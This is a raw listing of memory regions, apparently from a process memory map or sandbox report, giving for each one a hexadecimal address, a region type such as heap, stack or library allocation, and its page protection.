7FF848CF4000
trusted library allocation
page read and write
1D47DD74000
heap
page read and write
7FF789DEB000
unkown
page readonly
1B765000
heap
page read and write
1C7EE000
stack
page read and write
1D99E7B0000
heap
page read and write
1D99F040000
heap
page read and write
1D99E7CC000
heap
page read and write
1D99E9F4000
heap
page read and write
BAF000
stack
page read and write
1ACA6C47000
heap
page read and write
207DCDE6000
unkown
page read and write
2A41000
trusted library allocation
page read and write
1E9E211E000
heap
page read and write
7FF848E54000
trusted library allocation
page read and write
7FF848CA2000
trusted library allocation
page read and write
51BB000
trusted library allocation
page read and write
1AC8CBE4000
heap
page read and write
1D475961000
trusted library allocation
page read and write
BAB58FE000
stack
page read and write
1AC9E571000
trusted library allocation
page read and write
1D99E8A9000
heap
page read and write
207DCC00000
trusted library allocation
page read and write
1020000
heap
page read and write
7FF6373F4000
unkown
page read and write
1D99EEDC000
heap
page read and write
D07A1FF000
stack
page read and write
981E10B000
stack
page read and write
201C4FA8000
heap
page read and write
1E9E20CD000
heap
page read and write
7FF848B33000
trusted library allocation
page read and write
7FF848E82000
trusted library allocation
page read and write
207E00CA000
heap
page read and write
1E9E63D2000
heap
page read and write
1D463CFD000
heap
page read and write
20026C98000
trusted library allocation
page read and write
20026E18000
trusted library allocation
page read and write
7FF848F4D000
trusted library allocation
page read and write
207DDC28000
heap
page read and write
F7EB7F9000
stack
page read and write
7FF848CE2000
trusted library allocation
page read and write
146312B0000
trusted library section
page readonly
2003E660000
heap
page read and write
7FF848B1D000
trusted library allocation
page execute and read and write
247BF44E000
trusted library allocation
page read and write
53DB000
trusted library allocation
page read and write
1E9E42B3000
heap
page read and write
1DA65672000
trusted library allocation
page read and write
1C0EB000
stack
page read and write
14630313000
heap
page read and write
21EFEFF000
stack
page read and write
207DC61A000
unkown
page readonly
207D0BA0000
heap
page read and write
D80000
heap
page read and write
1DA64BC0000
heap
page execute and read and write
1D99E897000
heap
page read and write
1D99E85B000
heap
page read and write
247D7DB9000
heap
page read and write
207DD660000
unkown
page readonly
22234601000
heap
page read and write
1C97252B000
heap
page read and write
207E00A4000
heap
page read and write
1C333000
heap
page read and write
7FF848B6C000
trusted library allocation
page execute and read and write
1D99EE52000
heap
page read and write
7FF848E60000
trusted library allocation
page read and write
247BF521000
trusted library allocation
page read and write
14630B00000
heap
page read and write
207DEC1C000
unkown
page write copy
207DEFDE000
heap
page read and write
207DC540000
trusted library allocation
page read and write
26A1000
trusted library allocation
page read and write
1AC8CA4B000
heap
page read and write
7FF848D10000
trusted library allocation
page read and write
1D99F002000
heap
page read and write
207DDD68000
heap
page read and write
1DA63240000
heap
page read and write
7FF848D20000
trusted library allocation
page read and write
BAB61FE000
stack
page read and write
1B7C0000
heap
page read and write
201ADE0B000
trusted library allocation
page read and write
F7EC2FC000
stack
page read and write
D079DFE000
stack
page read and write
F7EA9FA000
stack
page read and write
1D99EF77000
heap
page read and write
20025D10000
trusted library allocation
page read and write
1D99EE84000
heap
page read and write
AE0000
heap
page read and write
207E0041000
heap
page read and write
207DCABA000
heap
page read and write
201C4F50000
heap
page read and write
207DCCEC000
unkown
page readonly
207DCF67000
heap
page read and write
207DCAC8000
heap
page read and write
207DEF88000
heap
page read and write
1D99EEDD000
heap
page read and write
C75000
heap
page read and write
1E9E2201000
trusted library allocation
page read and write
C4BEDFF000
stack
page read and write
F7E99FE000
stack
page read and write
1AC8E89E000
trusted library allocation
page read and write
207DC622000
unkown
page readonly
2223472E000
heap
page read and write
7FF848BB6000
trusted library allocation
page read and write
990000
heap
page read and write
2EF857E000
unkown
page readonly
7FF848B23000
trusted library allocation
page execute and read and write
20024358000
heap
page read and write
207DEF88000
heap
page read and write
207DCCE0000
unkown
page readonly
1AC8E6E6000
trusted library allocation
page read and write
207E0065000
heap
page read and write
1D47DEFC000
heap
page read and write
1D99E89F000
heap
page read and write
1E9E4179000
heap
page read and write
207DEEA1000
heap
page read and write
14636000000
heap
page read and write
7FF848D30000
trusted library allocation
page read and write
E86000
heap
page read and write
207DEF42000
heap
page read and write
7FF848F80000
trusted library allocation
page read and write
201AAFF6000
heap
page read and write
207DEFA5000
heap
page read and write
201ACA30000
heap
page execute and read and write
207DEFD0000
heap
page read and write
7FF848B8C000
trusted library allocation
page execute and read and write
207E0233000
heap
page read and write
9B8000
heap
page read and write
247D7D4A000
heap
page read and write
1D99EE96000
heap
page read and write
1D4669A5000
trusted library allocation
page read and write
207DD4E7000
heap
page read and write
9CA974E000
stack
page read and write
7FF848E90000
trusted library allocation
page read and write
7FF848CA1000
trusted library allocation
page read and write
4F44AFF000
stack
page read and write
207DA990000
trusted library allocation
page read and write
204A876000
stack
page read and write
1D99E862000
heap
page read and write
207DCF90000
heap
page read and write
207DCF00000
heap
page read and write
207DEF84000
heap
page read and write
207DDDAC000
heap
page read and write
E48000
heap
page read and write
1AC8E5DE000
trusted library allocation
page read and write
7FF637391000
unkown
page execute read
14630A15000
heap
page read and write
207D31F5000
heap
page read and write
103F000
stack
page read and write
2EF89FE000
stack
page read and write
1B6DF000
stack
page read and write
1D99F024000
heap
page read and write
7FF848B40000
trusted library allocation
page read and write
11E0000
heap
page read and write
1D99E9F4000
heap
page read and write
207D0DCD000
heap
page read and write
7FF6373FE000
unkown
page readonly
207DEE90000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
A18000
heap
page read and write
7FF848EFC000
trusted library allocation
page read and write
1AC8CA20000
heap
page read and write
207DD4DF000
heap
page read and write
207D9EB0000
trusted library allocation
page read and write
1D99F024000
heap
page read and write
7FF848B02000
trusted library allocation
page read and write
1D47DFA6000
heap
page read and write
1AC8E622000
trusted library allocation
page read and write
7FF848B0D000
trusted library allocation
page execute and read and write
1DA74C95000
trusted library allocation
page read and write
7FF848B14000
trusted library allocation
page read and write
207DE0CF000
heap
page read and write
1D99F0FB000
heap
page read and write
1E9E20CD000
heap
page read and write
247BF54D000
trusted library allocation
page read and write
1AFD0000
heap
page execute and read and write
1D99EEBA000
heap
page read and write
207DD7F8000
unkown
page readonly
207DC6D1000
trusted library allocation
page read and write
7FF848B4D000
trusted library allocation
page execute and read and write
B75000
heap
page read and write
7FF848D50000
trusted library allocation
page read and write
1AC8CB90000
trusted library allocation
page read and write
207DC34B000
trusted library allocation
page read and write
5B6E4B6000
stack
page read and write
201AC930000
trusted library allocation
page read and write
207DD760000
trusted library allocation
page read and write
1D99E89B000
heap
page read and write
7FF848E53000
trusted library allocation
page read and write
F40000
heap
page read and write
207D5C83000
heap
page read and write
7FF848F80000
trusted library allocation
page read and write
2580000
heap
page read and write
207DE349000
heap
page read and write
207E009A000
heap
page read and write
1C280000
heap
page read and write
1D99EA6D000
heap
page read and write
7FF848B4C000
trusted library allocation
page execute and read and write
1C2FD000
heap
page read and write
7FF848F40000
trusted library allocation
page execute and read and write
222345EB000
heap
page read and write
1D99F060000
heap
page read and write
F20000
heap
page read and write
1E9E2170000
heap
page read and write
D38000
heap
page read and write
1D4668E1000
trusted library allocation
page read and write
204A57F000
stack
page read and write
7FF848B1D000
trusted library allocation
page execute and read and write
7FF848DE0000
trusted library allocation
page read and write
F7E9BFF000
stack
page read and write
207DE679000
heap
page read and write
F7EBEFC000
stack
page read and write
7FF848CD0000
trusted library allocation
page read and write
7FF848B10000
trusted library allocation
page read and write
14630290000
heap
page read and write
1463582C000
heap
page read and write
D079D79000
stack
page read and write
1E9E2131000
heap
page read and write
1B33D000
stack
page read and write
1C417000
heap
page read and write
207DCCAE000
unkown
page write copy
1C974200000
heap
page read and write
7FF6373FE000
unkown
page write copy
1D99E7CA000
heap
page read and write
7FF848CC0000
trusted library allocation
page execute and read and write
1E9E2260000
heap
page read and write
1D99EF10000
heap
page read and write
269F000
trusted library allocation
page read and write
1E14B000
stack
page read and write
12DB3000
trusted library allocation
page read and write
1D99E82D000
heap
page read and write
21EFFFB000
stack
page read and write
1E9E20FB000
heap
page read and write
22234681000
heap
page read and write
201C4F60000
heap
page read and write
2BFB7350000
heap
page read and write
201AE8DF000
trusted library allocation
page read and write
146356E0000
trusted library allocation
page read and write
247BF4BA000
trusted library allocation
page read and write
146358C1000
heap
page read and write
1B0DE000
stack
page read and write
5310000
trusted library allocation
page read and write
1D99EE52000
heap
page read and write
7FF848E52000
trusted library allocation
page read and write
207DDDFB000
heap
page read and write
F7EBAFB000
stack
page read and write
1D99E9A3000
heap
page read and write
1D99E8A9000
heap
page read and write
5B6F309000
stack
page read and write
7FF848B5C000
trusted library allocation
page execute and read and write
22234470000
heap
page read and write
207E00C7000
heap
page read and write
7FF848BA0000
trusted library allocation
page read and write
247BF4AB000
trusted library allocation
page read and write
1D99EA58000
heap
page read and write
146356F0000
trusted library allocation
page read and write
207DE71F000
heap
page read and write
2CAE000
stack
page read and write
1D99EA47000
heap
page read and write
207DEE47000
heap
page read and write
207DDD57000
heap
page read and write
247BD8EE000
heap
page read and write
200276A7000
trusted library allocation
page read and write
1D99E7E6000
heap
page read and write
201C5024000
heap
page read and write
207D0D9B000
heap
page read and write
7FF848D00000
trusted library allocation
page read and write
20035F21000
trusted library allocation
page read and write
7FF848B13000
trusted library allocation
page execute and read and write
BAC000
heap
page read and write
CD8000
heap
page read and write
207DE613000
heap
page read and write
4F4563E000
stack
page read and write
207DCD00000
trusted library allocation
page read and write
F7ECEFC000
stack
page read and write
201AE929000
trusted library allocation
page read and write
200270D3000
trusted library allocation
page read and write
C8F000
heap
page read and write
1DA65826000
trusted library allocation
page read and write
1ACA6C49000
heap
page read and write
D07A0F8000
stack
page read and write
201AB130000
trusted library allocation
page read and write
7FF848BB0000
trusted library allocation
page read and write
20024350000
heap
page read and write
7FF848BCC000
trusted library allocation
page execute and read and write
D07999E000
stack
page read and write
207DCAA8000
heap
page read and write
1E9E5F43000
heap
page read and write
1D99EA28000
heap
page read and write
1D99E7F5000
heap
page read and write
7FF848E68000
trusted library allocation
page read and write
7FF848CE8000
trusted library allocation
page read and write
4F44DFD000
stack
page read and write
7FF848D60000
trusted library allocation
page read and write
7FF848D50000
trusted library allocation
page read and write
207D317B000
heap
page read and write
5B6E3F9000
stack
page read and write
1C97251E000
heap
page read and write
207DC600000
trusted library allocation
page read and write
1D99EA58000
heap
page read and write
1DA74C30000
trusted library allocation
page read and write
247BF51D000
trusted library allocation
page read and write
4F44EFE000
stack
page read and write
1D99EEEC000
heap
page read and write
207D0CC0000
heap
page read and write
7FF848DD0000
trusted library allocation
page read and write
7FF848CD0000
trusted library allocation
page read and write
1D4666B5000
trusted library allocation
page read and write
1DA66A45000
trusted library allocation
page read and write
D07AD4E000
stack
page read and write
1BECC000
stack
page read and write
1D465630000
trusted library allocation
page read and write
48C9000
trusted library allocation
page read and write
59608FC000
stack
page read and write
207DCB2F000
heap
page read and write
1D465674000
heap
page read and write
A1F000
heap
page read and write
207E0066000
heap
page read and write
207DE35F000
heap
page read and write
1E9E6455000
heap
page read and write
7FF848DA0000
trusted library allocation
page read and write
7FF848B23000
trusted library allocation
page read and write
BAB64FE000
stack
page read and write
1D99F024000
heap
page read and write
207D0D72000
heap
page read and write
210D3E14000
heap
page read and write
9B0000
heap
page read and write
7DF4A2060000
trusted library allocation
page execute and read and write
207DDC00000
heap
page read and write
7FF848CB0000
trusted library allocation
page execute and read and write
247D7DC1000
heap
page read and write
7FF848B3D000
trusted library allocation
page execute and read and write
207DC6A2000
unkown
page read and write
1C972516000
heap
page read and write
1D99E860000
heap
page read and write
207DE0F5000
heap
page read and write
26AC000
trusted library allocation
page read and write
1D465910000
trusted library allocation
page read and write
D07ADCD000
stack
page read and write
D23D0FD000
stack
page read and write
1AC8CB80000
heap
page read and write
1DA65DFC000
trusted library allocation
page read and write
1DA7D20D000
heap
page read and write
1D463CF9000
heap
page read and write
2EF827C000
stack
page read and write
207D57D1000
trusted library allocation
page read and write
1D47DFAD000
heap
page read and write
7FF848CD1000
trusted library allocation
page read and write
207DCF46000
heap
page read and write
207DE2E4000
heap
page read and write
247BF519000
trusted library allocation
page read and write
B60000
heap
page execute and read and write
207DD4E1000
heap
page read and write
4F44FFE000
stack
page read and write
14630860000
trusted library allocation
page read and write
22237EA0000
heap
page read and write
207DE24A000
heap
page read and write
9CA8D7B000
stack
page read and write
2BF9D224000
heap
page read and write
1D47DDA0000
heap
page read and write
1D47DF81000
heap
page read and write
1DA74C41000
trusted library allocation
page read and write
1D99F092000
heap
page read and write
1B77E000
stack
page read and write
207DCFDB000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
1DA65F29000
trusted library allocation
page read and write
1D99E9C2000
heap
page read and write
247BF53D000
trusted library allocation
page read and write
14630970000
trusted library section
page read and write
7FF848C20000
trusted library allocation
page execute and read and write
1D475C4C000
trusted library allocation
page read and write
207DD790000
trusted library allocation
page read and write
1DA630BA000
heap
page read and write
1D99E872000
heap
page read and write
207DEE36000
heap
page read and write
7FF848D80000
trusted library allocation
page read and write
1D99EA6D000
heap
page read and write
C7F000
stack
page read and write
1D99E8A9000
heap
page read and write
7FF848CB0000
trusted library allocation
page read and write
207DC740000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page read and write
207D5E90000
trusted library allocation
page read and write
7DF4914A0000
trusted library allocation
page execute and read and write
207DD548000
heap
page read and write
201AAFFE000
heap
page read and write
201AAF40000
heap
page read and write
247D7DB3000
heap
page read and write
C50000
heap
page read and write
AF1000
stack
page read and write
1C972450000
heap
page read and write
2BF9CE40000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
1D47DFBD000
heap
page read and write
1DA7D380000
heap
page read and write
207DE389000
heap
page read and write
1DA7D0B7000
heap
page read and write
7FF848B2D000
trusted library allocation
page execute and read and write
2BF9CE8B000
heap
page read and write
207E02C4000
heap
page read and write
207D0DF3000
heap
page read and write
981E8FD000
stack
page read and write
7FF848D02000
trusted library allocation
page read and write
7DF4A2040000
trusted library allocation
page execute and read and write
1D463D3A000
heap
page read and write
20027236000
trusted library allocation
page read and write
1D99E89F000
heap
page read and write
207DCE00000
heap
page read and write
1BFD0000
trusted library allocation
page read and write
1AECD000
stack
page read and write
1B28D000
stack
page read and write
12A45000
trusted library allocation
page read and write
207D5DF4000
heap
page read and write
207D0CC9000
heap
page read and write
2003E7DC000
heap
page read and write
1B710000
heap
page execute and read and write
FB0000
heap
page read and write
7FF848BF6000
trusted library allocation
page execute and read and write
7FF848B41000
trusted library allocation
page read and write
207DD5AA000
heap
page read and write
7FF848C90000
trusted library allocation
page read and write
1D4669D8000
trusted library allocation
page read and write
207DE389000
heap
page read and write
207E0143000
heap
page read and write
D95000
heap
page read and write
9CA8A78000
stack
page read and write
207DC730000
trusted library allocation
page read and write
247BDC04000
heap
page read and write
2E11000
trusted library allocation
page read and write
7FF848B14000
trusted library allocation
page read and write
7FF848B2D000
trusted library allocation
page execute and read and write
7FF848BD6000
trusted library allocation
page read and write
14631290000
trusted library section
page readonly
F7EADFB000
stack
page read and write
207DC5E0000
trusted library allocation
page read and write
7FF848CB2000
trusted library allocation
page read and write
201C4F9B000
heap
page read and write
207D5E20000
trusted library section
page readonly
201BCDED000
trusted library allocation
page read and write
1C972557000
heap
page read and write
1DA63390000
trusted library allocation
page read and write
1463584F000
heap
page read and write
146356F4000
trusted library allocation
page read and write
1D99E89F000
heap
page read and write
1D99E888000
heap
page read and write
2002439A000
heap
page read and write
1AC8CB84000
heap
page read and write
1C97255B000
heap
page read and write
53D9000
trusted library allocation
page read and write
9CA8AF9000
stack
page read and write
4F453FD000
stack
page read and write
1D463B50000
heap
page read and write
900000
trusted library allocation
page read and write
20026E89000
trusted library allocation
page read and write
207DC540000
trusted library allocation
page read and write
1B2EF000
stack
page read and write
21EF9FE000
stack
page read and write
207D0DA1000
heap
page read and write
F7ECDFC000
stack
page read and write
1AC8E3F0000
heap
page execute and read and write
207DDD00000
heap
page read and write
207DCFB4000
heap
page read and write
22234681000
heap
page read and write
7FF848B23000
trusted library allocation
page read and write
1C97255B000
heap
page read and write
1C6EB000
stack
page read and write
515A000
trusted library allocation
page read and write
207D5E50000
trusted library section
page readonly
1C2E0000
trusted library allocation
page read and write
F7EBDF5000
stack
page read and write
5B6F28E000
stack
page read and write
14635A50000
remote allocation
page read and write
7FF848CC6000
trusted library allocation
page read and write
247BF458000
trusted library allocation
page read and write
207DEEE4000
heap
page read and write
7FF848CD2000
trusted library allocation
page read and write
1ACA6D40000
heap
page execute and read and write
7FF848BB0000
trusted library allocation
page read and write
11BF000
stack
page read and write
207D313B000
heap
page read and write
537E000
trusted library allocation
page read and write
207E0243000
heap
page read and write
1D99F041000
heap
page read and write
C9A000
heap
page read and write
1D466946000
trusted library allocation
page read and write
207D0C78000
heap
page read and write
2003E2CC000
heap
page read and write
247CF3B1000
trusted library allocation
page read and write
2E1F000
trusted library allocation
page read and write
7FF848B30000
trusted library allocation
page read and write
FDD000
heap
page read and write
7FF848E79000
trusted library allocation
page read and write
C4BF5FE000
stack
page read and write
C80000
heap
page read and write
9CA98C9000
stack
page read and write
53D1000
trusted library allocation
page read and write
207DC680000
trusted library allocation
page read and write
1D99EFBC000
heap
page read and write
1D99E8A9000
heap
page read and write
1D99E82A000
heap
page read and write
22234689000
heap
page read and write
1D463DF0000
trusted library allocation
page read and write
22238010000
trusted library allocation
page read and write
1C3F4000
heap
page read and write
1AC8E681000
trusted library allocation
page read and write
20026E81000
trusted library allocation
page read and write
1AC8E6BC000
trusted library allocation
page read and write
1D463CEF000
heap
page read and write
207DD022000
trusted library allocation
page read and write
BBE000
heap
page read and write
2BF9CE20000
heap
page read and write
207DE34B000
heap
page read and write
207DC6F0000
trusted library allocation
page read and write
2EF837E000
unkown
page readonly
7FF848B30000
trusted library allocation
page read and write
F7E9CF9000
stack
page read and write
5375000
trusted library allocation
page read and write
207DC35C000
trusted library allocation
page read and write
1DA7D47B000
heap
page read and write
14635630000
trusted library allocation
page read and write
F7EB0FE000
stack
page read and write
207E0473000
heap
page read and write
7FF848CE0000
trusted library allocation
page execute and read and write
1D99EFCD000
heap
page read and write
1D99E9E3000
heap
page read and write
7FF848CB0000
trusted library allocation
page read and write
207DE3CE000
heap
page read and write
1DA7D0B1000
heap
page read and write
207DCF20000
heap
page read and write
DE0000
heap
page read and write
5379000
trusted library allocation
page read and write
9CA8B7B000
stack
page read and write
1E9E20BA000
heap
page read and write
7DF423731000
trusted library allocation
page execute read
1D99E991000
heap
page read and write
4F450FE000
stack
page read and write
20024300000
heap
page read and write
1D99EA58000
heap
page read and write
1D99EA26000
heap
page read and write
1AC8E551000
trusted library allocation
page read and write
7FF848B2B000
trusted library allocation
page read and write
5484000
trusted library allocation
page read and write
207E0184000
heap
page read and write
B10000
trusted library allocation
page read and write
7FF848DC0000
trusted library allocation
page read and write
7FF848DB0000
trusted library allocation
page read and write
7FF848B8C000
trusted library allocation
page execute and read and write
201AB039000
heap
page read and write
1AC8C8F0000
heap
page read and write
2EF8BFE000
stack
page read and write
207D0C9D000
heap
page read and write
2003622C000
trusted library allocation
page read and write
207E0144000
heap
page read and write
1E9E2078000
heap
page read and write
207DCE13000
heap
page read and write
1D99EA85000
heap
page read and write
D079913000
stack
page read and write
1E9E4231000
heap
page read and write
2A2F000
stack
page read and write
BAB60FE000
stack
page read and write
1C9725AA000
heap
page read and write
207DEF8E000
heap
page read and write
7FF848C10000
trusted library allocation
page execute and read and write
14630273000
heap
page read and write
1D99E9C2000
heap
page read and write
207D5D1F000
heap
page read and write
146311A0000
trusted library allocation
page read and write
1D99F002000
heap
page read and write
146356B0000
trusted library allocation
page read and write
B00000
heap
page read and write
1D99F072000
heap
page read and write
1DA64C9B000
trusted library allocation
page read and write
1BDC5000
stack
page read and write
1D99E991000
heap
page read and write
10BE000
stack
page read and write
1D99EA16000
heap
page read and write
1C97252B000
heap
page read and write
1DA63109000
heap
page read and write
201ACB73000
trusted library allocation
page read and write
207D0D48000
heap
page read and write
7FF848B6C000
trusted library allocation
page execute and read and write
207DE133000
heap
page read and write
12DB1000
trusted library allocation
page read and write
201ADB30000
trusted library allocation
page read and write
1AC8E563000
trusted library allocation
page read and write
207DCC30000
trusted library allocation
page read and write
7FF848B33000
trusted library allocation
page execute and read and write
207DE217000
heap
page read and write
7FF848D40000
trusted library allocation
page read and write
247CF3BD000
trusted library allocation
page read and write
146356E0000
trusted library allocation
page read and write
1D99E7ED000
heap
page read and write
1D99E9B1000
heap
page read and write
1D99EF9A000
heap
page read and write
7FF848F20000
trusted library allocation
page read and write
E5A000
heap
page read and write
207DCDF0000
unkown
page readonly
2003620E000
trusted library allocation
page read and write
7FF848B7C000
trusted library allocation
page execute and read and write
1D99E895000
heap
page read and write
210D3A40000
heap
page read and write
207DEFC6000
heap
page read and write
1D99F041000
heap
page read and write
1E9E20BA000
heap
page read and write
7FF848C92000
trusted library allocation
page read and write
207DCC00000
trusted library allocation
page read and write
1DA74F15000
trusted library allocation
page read and write
22236490000
heap
page read and write
247BF3B1000
trusted library allocation
page read and write
1D99EF88000
heap
page read and write
207DD456000
heap
page read and write
1CCEC000
stack
page read and write
1DA7D4A3000
heap
page read and write
207D5E61000
trusted library allocation
page read and write
7FF848B34000
trusted library allocation
page read and write
207DC630000
trusted library allocation
page read and write
207DE574000
unkown
page execute read
146302FF000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
201C5366000
heap
page read and write
2BF9CE95000
heap
page read and write
2003621C000
trusted library allocation
page read and write
207DE339000
heap
page read and write
7FF848D10000
trusted library allocation
page read and write
210D3C29000
heap
page read and write
2002778C000
trusted library allocation
page read and write
C70000
heap
page read and write
207DCFFD000
heap
page read and write
1E9E211A000
heap
page read and write
222345FB000
heap
page read and write
1E9E211E000
heap
page read and write
12DB8000
trusted library allocation
page read and write
2EF7F7E000
unkown
page readonly
750000
unkown
page readonly
207DD8F0000
trusted library allocation
page read and write
207DC690000
trusted library allocation
page read and write
7FF848BC6000
trusted library allocation
page read and write
1E9E42B3000
heap
page read and write
F7EC9FD000
stack
page read and write
5B6E43E000
stack
page read and write
53DD000
trusted library allocation
page read and write
20025CA0000
heap
page execute and read and write
FB0000
heap
page read and write
207DE78A000
heap
page read and write
12BF000
stack
page read and write
52D5000
trusted library allocation
page read and write
1E9E20AE000
heap
page read and write
207DCF23000
heap
page read and write
9CA97CD000
stack
page read and write
2840000
trusted library allocation
page read and write
207DE73C000
heap
page read and write
5B6E37D000
stack
page read and write
1E9E6391000
heap
page read and write
7FF848BE0000
trusted library allocation
page read and write
207DE3E1000
heap
page read and write
981E5FE000
stack
page read and write
1D4671D3000
trusted library allocation
page read and write
201AB0E0000
trusted library allocation
page read and write
1C97254B000
heap
page read and write
9C6F0FF000
stack
page read and write
1B88F000
stack
page read and write
22234724000
heap
page read and write
F7ED7FB000
stack
page read and write
7FF848D34000
trusted library allocation
page read and write
7FF848D60000
trusted library allocation
page execute and read and write
C00000
trusted library allocation
page read and write
1E9E211A000
heap
page read and write
7FF848F00000
trusted library allocation
page read and write
1D465E0D000
trusted library allocation
page read and write
1D47DEBD000
heap
page read and write
7FF6373D8000
unkown
page readonly
7FF848CA0000
trusted library allocation
page read and write
20024362000
heap
page read and write
2C00000
heap
page read and write
2920000
heap
page read and write
207DD820000
trusted library allocation
page read and write
59609FF000
unkown
page read and write
7FF848CE4000
trusted library allocation
page read and write
20026E96000
trusted library allocation
page read and write
F7ED2FC000
stack
page read and write
7FF848F30000
trusted library allocation
page read and write
1DA7D392000
heap
page read and write
1D99E80E000
heap
page read and write
7FF848B4D000
trusted library allocation
page execute and read and write
207DC700000
trusted library allocation
page read and write
7FF848DC0000
trusted library allocation
page read and write
1D99E9D4000
heap
page read and write
7FF789E20000
unkown
page readonly
1C9742E4000
heap
page read and write
7FF848D60000
trusted library allocation
page read and write
1B88E000
stack
page read and write
222345FB000
heap
page read and write
1AC8E8A2000
trusted library allocation
page read and write
9DF000
heap
page read and write
E80000
heap
page read and write
1DA7D43A000
heap
page read and write
1E9E211D000
heap
page read and write
1D463CC2000
heap
page read and write
1D99EFCD000
heap
page read and write
7FF848DC0000
trusted library allocation
page read and write
12A43000
trusted library allocation
page read and write
201C52A8000
heap
page read and write
207DE31B000
heap
page read and write
1D99E89F000
heap
page read and write
207DE1B9000
heap
page read and write
1D99EA26000
heap
page read and write
531D000
trusted library allocation
page read and write
1D99EEFE000
heap
page read and write
207DE200000
heap
page read and write
207D0C00000
heap
page read and write
F7EC1FB000
stack
page read and write
1D99EA16000
heap
page read and write
1C97254B000
heap
page read and write
20026B2B000
trusted library allocation
page read and write
207DD8EA000
unkown
page readonly
2EF9179000
stack
page read and write
20027140000
trusted library allocation
page read and write
207DCF0A000
heap
page read and write
11E5000
heap
page read and write
1E9E20FB000
heap
page read and write
7FF848B40000
trusted library allocation
page read and write
207D3141000
heap
page read and write
207DEE85000
heap
page read and write
1DA65FE7000
trusted library allocation
page read and write
7FF848BF0000
trusted library allocation
page execute and read and write
2BFB7510000
heap
page read and write
201C5140000
heap
page read and write
2BF9CE66000
heap
page read and write
247BF5AB000
trusted library allocation
page read and write
1D465760000
heap
page read and write
A1B000
heap
page read and write
207DD760000
trusted library allocation
page read and write
207DEF94000
heap
page read and write
207DC33C000
trusted library allocation
page read and write
1BB6E000
stack
page read and write
1DA66A4A000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
2B7F000
stack
page read and write
1D475C32000
trusted library allocation
page read and write
E20000
heap
page read and write
207DE382000
heap
page read and write
7FF848B3B000
trusted library allocation
page execute and read and write
14630C91000
trusted library allocation
page read and write
1B5DF000
stack
page read and write
1AFCD000
stack
page read and write
207DCFE8000
heap
page read and write
22234685000
heap
page read and write
7FF848B40000
trusted library allocation
page read and write
247BDBF0000
heap
page read and write
2EF987A000
stack
page read and write
22236496000
heap
page read and write
1D99EEA8000
heap
page read and write
201AAFEE000
heap
page read and write
5D0000
heap
page read and write
247BF43D000
trusted library allocation
page read and write
FF4000
heap
page read and write
1E9E6391000
heap
page read and write
207DE30E000
heap
page read and write
1D99EA73000
heap
page read and write
53D7000
trusted library allocation
page read and write
DF0000
heap
page read and write
207DD632000
unkown
page readonly
12D0000
heap
page read and write
C4BF8FE000
stack
page read and write
D70000
trusted library section
page read and write
538B000
trusted library allocation
page read and write
1E9E2122000
heap
page read and write
1D99EEB8000
heap
page read and write
207DD5CF000
heap
page read and write
207DD63C000
unkown
page readonly
5B6E1F9000
stack
page read and write
207DDC31000
heap
page read and write
1D99EA28000
heap
page read and write
207E00B3000
heap
page read and write
7FF848CF0000
trusted library allocation
page read and write
52EA000
trusted library allocation
page read and write
7FF789DFD000
unkown
page write copy
7FF848B23000
trusted library allocation
page execute and read and write
1D99EFF1000
heap
page read and write
7FF848CE0000
trusted library allocation
page execute and read and write
1D99E895000
heap
page read and write
207DE3FE000
heap
page read and write
1C9728A0000
heap
page read and write
1D99EF20000
heap
page read and write
1E9E3D50000
heap
page read and write
1DA74C21000
trusted library allocation
page read and write
1D99EA7E000
heap
page read and write
7FF848B0D000
trusted library allocation
page execute and read and write
7FF848E00000
trusted library allocation
page read and write
1D99F050000
heap
page read and write
51B4000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
7FF848BE6000
trusted library allocation
page execute and read and write
22234550000
heap
page read and write
207DD5F7000
heap
page read and write
FF1000
heap
page read and write
7FF848F70000
trusted library allocation
page read and write
207E0098000
heap
page read and write
207E0353000
heap
page read and write
F7EC3FE000
stack
page read and write
207DDD8C000
heap
page read and write
2EF7E7E000
stack
page read and write
146300D0000
heap
page read and write
BAB53AE000
stack
page read and write
26AF000
trusted library allocation
page read and write
7FF848B10000
trusted library allocation
page read and write
7FF848B00000
trusted library allocation
page read and write
207D31C1000
heap
page read and write
207DEFC4000
heap
page read and write
5243000
trusted library allocation
page read and write
52F6000
trusted library allocation
page read and write
7FF848E60000
trusted library allocation
page read and write
2003E7B8000
heap
page read and write
14630302000
heap
page read and write
207DD678000
unkown
page readonly
1D47DE80000
heap
page read and write
4967000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
1E9E2115000
heap
page read and write
2EF8D7E000
unkown
page readonly
207DDC33000
heap
page read and write
207DDDD1000
heap
page read and write
146310A1000
trusted library allocation
page read and write
1B751000
heap
page read and write
4F4577E000
stack
page read and write
247BF4A1000
trusted library allocation
page read and write
1D99EF9A000
heap
page read and write
1C972559000
heap
page read and write
207DD63A000
unkown
page read and write
1E9E5F4A000
heap
page read and write
247BDBC0000
heap
page read and write
207DCB3D000
heap
page read and write
1DA74F1D000
trusted library allocation
page read and write
201AB034000
heap
page read and write
207DD760000
trusted library allocation
page read and write
7FF848B1D000
trusted library allocation
page execute and read and write
12698000
trusted library allocation
page read and write
D23D17F000
stack
page read and write
1AFFC000
stack
page read and write
207D5D4A000
heap
page read and write
1D99E816000
heap
page read and write
207DE37C000
heap
page read and write
7FF848CF0000
trusted library allocation
page execute and read and write
1DA6306F000
heap
page read and write
207E0312000
heap
page read and write
1D466B58000
trusted library allocation
page read and write
BAB5BFE000
stack
page read and write
201AB104000
heap
page read and write
BE2000
heap
page read and write
207DC640000
unkown
page readonly
2EF9F7E000
unkown
page readonly
7FF848B40000
trusted library allocation
page read and write
207DD445000
heap
page read and write
7FF848CB7000
trusted library allocation
page read and write
4F447D2000
stack
page read and write
207DCF1A000
heap
page read and write
D079FF7000
stack
page read and write
146356B1000
trusted library allocation
page read and write
14631620000
trusted library allocation
page read and write
1C9725A8000
heap
page read and write
5471000
trusted library allocation
page read and write
7FF848B34000
trusted library allocation
page read and write
7FF848DD0000
trusted library allocation
page read and write
1D99EA58000
heap
page read and write
1D99F0FA000
heap
page read and write
201ACAB0000
heap
page execute and read and write
2EF8CFE000
stack
page read and write
B20000
heap
page read and write
7FF848BE6000
trusted library allocation
page execute and read and write
207DCDF0000
trusted library allocation
page read and write
